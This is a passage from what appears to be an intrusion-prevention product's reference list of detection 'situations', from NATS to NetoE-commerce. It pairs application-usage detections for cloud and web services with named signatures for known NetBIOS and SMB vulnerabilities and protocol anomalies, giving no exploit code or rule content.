Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Description: NATS is an open source messaging system for cloud native applications.
Back to top

Natural-HR

About this situation: Application Natural-HR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Natural HR- online web based HR software - hosted, cloud based, free human resources software for small to medium businesses.
Back to top

Natural-Insight

About this situation: Application Natural-Insight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Insight is a provider of cloud-based workforce management software to merchandisers, product companies, event marketers and retailers.
Back to top

Nature

About this situation: Nature usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-943-5242
Last changed: sgpkg-ips-943-5242
Description: Nature is a multidisciplinary scientific journal.
Back to top

NatWest

About this situation: NatWest usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-641-5211
Last changed: sgpkg-ips-1764-5242
Description: NatWest usage detected. NatWest is a UK based banking corporation.
Back to top

Naver-Blog-Posting

About this situation: Naver usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Naver is a Korean blogging site.
Back to top

Naver-Mail

About this situation: Naver usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Naver Mail is a web based mailing site.
Back to top

Navicure

About this situation: Application Navicure detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Navicure's cloud-based claims clearinghouse and patient payment solutions help healthcare organizations of all sizes increase revenue, accelerate cash flow, and reduce cost in the course of managing insurance claims and patient payments.
Back to top

Navilytics

About this situation: Application Navilytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Navilytics is a web analytics platform for visitor recordings, heatmaps.
Back to top

NaviSite

About this situation: Application NaviSite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NaviSite is a premier of enterprise-class hosting, managed application, managed messaging and managed cloud services.
Back to top

NaviView

About this situation: Application NaviView detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NaviView is a customer area of NaviSite's hosting, application management and managed cloud services.
Back to top

Navori-QL-Professional

About this situation: Application Navori-QL-Professional detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: QL Professional is an enterprise-grade software. It includes QL Server featuring multi-user, multi-level web content management module, playlist scheduling, rule-based playback, monitoring and reporting.
Back to top

Nbc.com-Streaming

About this situation: nbc.com streaming usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1641-5242
Description: NBC Universal provides an online video service, where users can access videos posted by NBC. The application can be accessed using a web browser at the site: http://www.nbc.com/.
Back to top

Nccgroup

About this situation: Application Nccgroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NCC Group is a information assurance specialist. NCC Group provide freedom from doubt that business critical information, websites, applications and infrastructure are available, protected, and operating as they should be at all times.
Back to top

NCHsoftware.com

About this situation: Application NCHsoftware.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DesktopNow is easy-to-use program for remote PC access to log into your computer from anywhere, control your desktop, run your programs and access files.
Back to top

NCR-Silver

About this situation: Application NCR-Silver detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NCR Silver mobile point-of-sale system that can cost-effectively manage your entire business.
Back to top

Ndrive.com

About this situation: NDrive.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: A web based file sharing site.
Back to top

Ndrive.jp

About this situation: NDrive.jp usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: A web based Japanese file sharing site.
Back to top

NearlyFreeSpeech

About this situation: Application NearlyFreeSpeech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NearlyFreeSpeech - WebSites Hosting service
Back to top

NeatCloud

About this situation: Application NeatCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Neat Cloud - backs up your Digital Filing System, and allows you to add to it or access it from anywhere.
Back to top

Need-An-Article

About this situation: Application Need-An-Article detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Need-An-Article is Article Writing Service that provides, website writing, business writing, technical and creative writing, get high quality custom content.
Back to top

Neevia-Technology-PDFcompress

About this situation: Application Neevia-Technology-PDFcompress detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Online PDFcompress makes it possible for anyone to reduce the size of large PDF documents without the need of installing special software.
Back to top

Nelonen

About this situation: Nelonen usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-1017-5242
Description: Nelonen a Finnish television channel and online media service.
Back to top

Nelonen-Ruutu

About this situation: Nelonen Ruutu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-870-5242
Description: Nelonen Ruutu is a Finnish tv program / video on-demand service.
Back to top

Neocase-Software

About this situation: Application Neocase-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Neocase Software is a provider of integrated HR and Finance service delivery solutions. Neocase enables large and mid-size organizations to reduce costs, standardize processes and improve employee, customer and supplier relationships.
Back to top

Neogov

About this situation: Application Neogov detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Neogov is a provider of human resource management software and HR systems for government, public sector and higher education.
Back to top

Neosites

About this situation: Neosites usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Create a website and online store for free.
Back to top

Nessus

About this situation: Endpoint Context Agent based Nessus detection
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Description: Nessus endpoint application has been detected.
Back to top

Nessus

About this situation: Nessus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1055-5242
Description: Nessus is a network-based vulnerability scanner which is developed by Tenable Network Security.
Back to top

Nestle-Pure-Life

About this situation: Application Nestle-Pure-Life detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nestle Pure Life - Water delivery service
Back to top

Net-Results

About this situation: Application Net-Results detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Net-Results Marketing Automation powerful lead management solutions for marketing and sales.
Back to top

Netalogue

About this situation: Application Netalogue detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Netalogue provides B2B ecommerce solution and ecommerce platform software for wholesalers, distributors and manufacturers.
Back to top

NetApp

About this situation: NetApp
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Description: NetApp provides intelligent data infrastucture such as unified data storage, integrated data services, and cloud operations (CloudOps) solutions.
Back to top

NetBase

About this situation: Application NetBase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NetBase delivers the social intelligence and agencies use to publish, monitor, analyze and engage with customers. Its solutions enable digital marketing, public relations, brand management, customer service, sales and product innovation leaders to craft strategies.
Back to top

NetBeans

About this situation: Application NetBeans detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NetBeans is an open-source project dedicated to providing rock solid software development products that address the needs of developers, users and the businesses who rely on NetBeans as a basis for their products.
Back to top

NetBIOS-Datagram-Service

About this situation: NetBIOS Datagram Service traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1158-5242
Description: NetBIOS Datagram Service usage. This service is used for sending and receiving datagrams as well as broadcasting.
Back to top

NetBIOS-Name-Service

About this situation: NetBIOS Name Service traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-1156-5242
Description: NetBIOS Name Service usage. This service is used for local computer name discovery.
Back to top

NetBIOS-TCP_Microsoft-Explorer-Long-Share-Name-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP NetBIOS Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2004-10, CVE2004, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Explorer-Long-Share-Name-Buffer-Overflow
Description:
Back to top

NetBIOS-TCP_Microsoft-Windows-Lanman-Denial-Of-Service

About this situation: A denial of service vulnerability in Microsoft Windows Lanman service
Context: TCP NetBIOS Client Stream
Severity: 2
Tags: Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, x86, CVE2002, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-92-1314
Last changed: sgpkg-ips-188-2032
Vulnerability: Microsoft-Windows-Lanman-Denial-Of-Service
Description:
Back to top

NetBIOS-TCP_Microsoft-Windows-Smb-Client-Message-Size-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP NetBIOS Server Stream
Severity: 2
Tags: Windows, Any Hardware, MS2010-04, CVE2010, Windows not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-Windows-Smb-Client-Message-Size-Vulnerability
Description:
Back to top

NetBIOS-TCP_Microsoft-Windows-SMB2-Response-Parsing-Vulnerability-CVE-2011-1268

About this situation: An attempt to exploit a Windows SMB2 parsing vulnerability
Context: TCP NetBIOS Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-06, CVE2011, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Windows-SMB2-Response-Parsing-Vulnerability-CVE-2011-1268
Description:
Back to top

NetBIOS-TCP_Microsoft-Windows-Vulnerability-CVE-2017-0016

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Windows
Context: TCP NetBIOS Server Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-855-5242
Vulnerability: Microsoft-Windows-Vulnerability-CVE-2017-0016
Description:
Back to top

NetBIOS-TCP_MS-NetDDE-Remote-Buffer-Overflow-MS04-031

About this situation: Attempt to exploit a buffer overflow in MS Windows NetDDE
Context: TCP NetBIOS Client Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Windows NetDDE service, MS2004-10, CVE2004, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-371-4219
Vulnerability: MS-NetDDE-Remote-Buffer-Overflow-MS04-031
Description:
Back to top

NetBIOS-TCP_MS-NetDDE-Remote-Buffer-Overflow-MS04-031-2

About this situation: Attempt to exploit a buffer overflow in MS Windows NetDDE
Context: TCP NetBIOS Client Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Windows NetDDE service, MS2004-10, CVE2004, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-371-4219
Last changed: sgpkg-ips-371-4219
Vulnerability: MS-NetDDE-Remote-Buffer-Overflow-MS04-031
Description:
Back to top

NetBIOS-TCP_Nessus-Vulnerability-Scanner-Usage

About this situation: Detects an NetBIOS request used by the Nessus vulnerability scanner
Context: TCP NetBIOS Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Nessus, Any Operating System not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-159-2032
Vulnerability: Nessus-Vulnerability-Scanner-Usage
Description:
Back to top

NetBIOS-TCP_RFPoison

About this situation: RFPoison denial of service
Context: TCP NetBIOS Client Stream
Severity: 2
Tags: Windows NT 4.0, Any Hardware, MS1999, CVE1999, Windows NT 4.0 not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: NetBIOS-NT4-RFPoison-DoS
Description:
Back to top

NetBIOS-TCP_Samba-receive-smb-raw-SMB-Packets-Parsing-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Samba detected
Context: TCP NetBIOS Server Stream
Severity: 7
Tags: Linux, Any Hardware, Samba, CVE2008, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-156-2032
Vulnerability: Samba-receive_smb_raw-SMB-Packets-Parsing-Buffer-Overflow
Description:
Back to top

NetBIOS-TCP_Samba-SMB1-Packets-Chaining-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Samba detected
Context: TCP NetBIOS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2010, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-317-4219
Last changed: sgpkg-ips-319-4219
Vulnerability: Samba-SMB1-Packets-Chaining-Memory-Corruption
Description:
Back to top

NetBIOS-TCP_SMB-Microsoft-Windows-SMB-DOS-CVE-2011-1267

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: TCP NetBIOS Client Stream
Severity: 2
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-1611-5242
Vulnerability: Microsoft-Windows-SMB2-Write-DOS-CVE-2011-1267
Description:
Back to top

NetBIOS-TCP_SMB2-DFS-DOS-MS09-050

About this situation: Detects SMB2 DFS Denial Of Service
Context: TCP NetBIOS Client Stream
Severity: 2
Tags: Windows, Any Hardware, MS2009-10, CVE2009, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-258-3038
Last changed: sgpkg-ips-258-3038
Vulnerability: Microsoft-Windows-SMB2-DFS-DOS
Description:
Back to top

NetBIOS-TCP_SMB2-Microsoft-Windows-SMB-Transaction-CVE-2011-0661

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: TCP NetBIOS Client Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-386-4219
Vulnerability: Microsoft-Windows-SMB-Transaction-CVE-2011-0661
Description:
Back to top

NetBIOS-TCP_SMB2-Microsoft-Windows-SMB2-Write-CVE-2011-1267

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: TCP NetBIOS Client Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Windows-SMB2-Write-DOS-CVE-2011-1267
Description:
Back to top

NetBIOS-TCP_SMB2-Windows-Kernel-DOS

About this situation: Attempt to exploit an SMB2 Windows Kernel Denial of Service
Context: TCP NetBIOS Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-04, CVE2009, Windows not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-266-3038
Last changed: sgpkg-ips-438-4219
Vulnerability: Microsoft-Windows-Kernel-SMB2-DOS
Description:
Back to top

NetBIOS-TCP_Suspicious-Request

About this situation: An exploit against a code execution vulnerability
Context: TCP NetBIOS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

NetBIOS-UDP_CS-Microsoft-Windows-Active-Directory-Browser-Election-BOF

About this situation: An attempt to exploit a vulnerability in Microsoft Active Directory detected
Context: UDP NetBIOS Client Stream
Severity: 7
Tags: Windows 2003, Any Hardware, MS2011-04, CVE2011, Windows 2003 not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-473-5211
Last changed: sgpkg-ips-473-5211
Vulnerability: Microsoft-Windows-Active-Directory-Browser-Election-Buffer-Overflow
Description:
Back to top

NetBIOS-UDP_CS-MS-Windows-Print-Spooler-Service-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: UDP NetBIOS Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-08, CVE2012, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: MS-Windows-Print-Spooler-Service-Format-String-Vulnerability
Description:
Back to top

NetBIOS-UDP_Microsoft-Windows-Browser-Election-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP NetBIOS Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-04, CVE2011, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: Microsoft-Windows-Browser-Election-Buffer-Overflow
Description:
Back to top

NetBIOS-UDP_Suspicious-Request

About this situation: A suspicious traffic pattern detected
Context: UDP NetBIOS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

NetBIOS-UDP_Windows-WPAD-Proxy-Discovery-Elevation-Of-Privilege-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: UDP NetBIOS Client Stream
Severity: 7
Tags: Windows 2008 R2, Windows 2012, Windows 2008, Windows Vista SP2, Windows RT 8.1, Windows 8.1, Windows 2012 R2, Windows 10.0, Windows 10.1511, Windows 7 SP1, Any Hardware, MS2016-06, CVE2016, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-770-5211
Vulnerability: Windows-WPAD-Proxy-Discovery-Elevation-Of-Privilege-Vulnerability
Description:
Back to top

NetBIOS_Client-Invalid-Session-Message

About this situation: Invalid headers in a NetBIOS Session Message
Context: NETBIOS without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: A NetBIOS Session Message with an invalid header was seen. A valid header consists of a message type, length, and flags (which must be zero, except one additional high-order bit for the length). This might be an evasion attempt.
Back to top

NetBIOS_Client-Invalid-Session-Request

About this situation: A NetBIOS Session Request was seen in an invalid context
Context: NETBIOS without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: A NetBIOS Session Request from the client was seen which was either not at the beginning of the connection, or the client sent a new message before receiving a response. This might be an evasion attempt.
Back to top

NetBIOS_Client-Invalid-Session-Request-Payload

About this situation: Invalid payload in a NetBIOS Session Request
Context: NETBIOS without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: A NetBIOS Session Request with an invalid payload was seen. A valid payload consists of the called and caller names in the NetBIOS name representation. This might be an evasion attempt.
Back to top

NETBIOS_Client-Session-Keepalive

About this situation: A NETBIOS packet from client with keepalive type was detected
Context: NETBIOS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Description: A NETBIOS packet from client with a keepalive type was detected. This is a normal packet if the connection is configured to be kept alive.
Back to top

NETBIOS_Client-Session-Packet-Type-Unknown

About this situation: A NETBIOS packet from client with unknown type was detected
Context: NETBIOS without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-389-4219
Description: A NETBIOS packet from client with an unknown type was detected. Normally NETBIOS packets should be of known session packet types listed in RFC1002, section 4.3.1. This may be an IDS evasion attempt.
Back to top

NETBIOS_Datagram-Fragmented

About this situation: A fragmented NETBIOS datagram was detected
Context: NETBIOS without parameters
Severity: 2
Tags: Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-454-4333
Description: A fragmented NETBIOS datagram was detected. Normally NETBIOS datagrams should not be fragmented. This may be an IDS evasion attempt.
Back to top

NETBIOS_Fragmentation-Loss

About this situation: Unusual NETBIOS datagram fragmentation detected
Context: NETBIOS without parameters
Severity: 2
Tags: Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-454-4333
Description: A fragmented NETBIOS datagram with unusual fragmentation order was detected. Normally NETBIOS datagrams should never be fragmented. This may be an IDS evasion attempt. Because of the unusual fragmentation order, the inspection may be incomplete.
Back to top

Netbiscuits

About this situation: Netbiscuits usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Netbiscuits is a leading provider of mobile web analytics and device detection software to track smartphone, feature phone, tablet and PC user traffic for real-time.
Back to top

Netcommissions

About this situation: Application Netcommissions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NetCommissions helps companies improve sales force productivity by providing market leading on-line sales commission management solutions that ensure performance feedback to the sales organization is timely, accurate and relevant.
Back to top

NetDespatch

About this situation: Application NetDespatch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NetDespatch- is the SaaS parcel data management platform for postal and parcel carriers worldwide.
Back to top

Netdimensions

About this situation: Application Netdimensions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: etDimensions
Back to top

Netdocuments

About this situation: NetDocuments usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: NetDocuments provides cloud document management and collaboration solutions for law firms, financial services and other businesses.
Back to top

Netease-Webmail

About this situation: NetEase WebMail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: A Chinese Web based mail that operates 163.com, a popular web portal.
Back to top

NetExam

About this situation: Application NetExam detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NetExam delivers applications that provide sales channels with a total learning environment. Specifically targeted for the Vendor
Back to top

NetFacilities

About this situation: Application NetFacilities detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NetFacilities is a web Based CMMS software that can be used by a PC or Mobile device with Included Training and Lifetime Support.
Back to top

Netfiles.de

About this situation: netfiles.de usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: The cloud service netfiles offers companies and geographically dispersed teams a web-based application for online document management, secure file sharing and efficient collaboration.
Back to top

Netfira

About this situation: Application Netfira detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Netfira is a B2B suite for a supply chain solution for rationalizing purchasing and sales processes.
Back to top

Netfirms

About this situation: Application Netfirms detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Netfirms is aweb hosting offering additional business services such as
Back to top

Netflix

About this situation: Netflix usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-1849-5242
Description: Netflix is a company that offers on-demand video streaming over the Internet, and flat rate DVD and Blu-ray Disc rental-by-mail.
Back to top

Netflow

About this situation: Netflow record received from third-party device
Context: Log Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-517-5211
Last changed: sgpkg-ips-1296-5242
Description:
Back to top

Netfolder

About this situation: Netfolder usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Korean file-sharing service
Back to top

Netim

About this situation: Application Netim detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Netim is an Internet domain name registrar company.
Back to top

NetLineGroup

About this situation: Application NetLineGroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NetLineGroup is an IT company - system integrator which implements projects in the sectors of economy
Back to top

Netload

About this situation: Netload usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-630-5211
Description: Netload is a web-based file hosting service, which lets users upload, download, remove and share files.
Back to top

Netlog

About this situation: Netlog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

NetoE-commerce

About this situation: Application NetoE-commerce detected
Context: Application Context
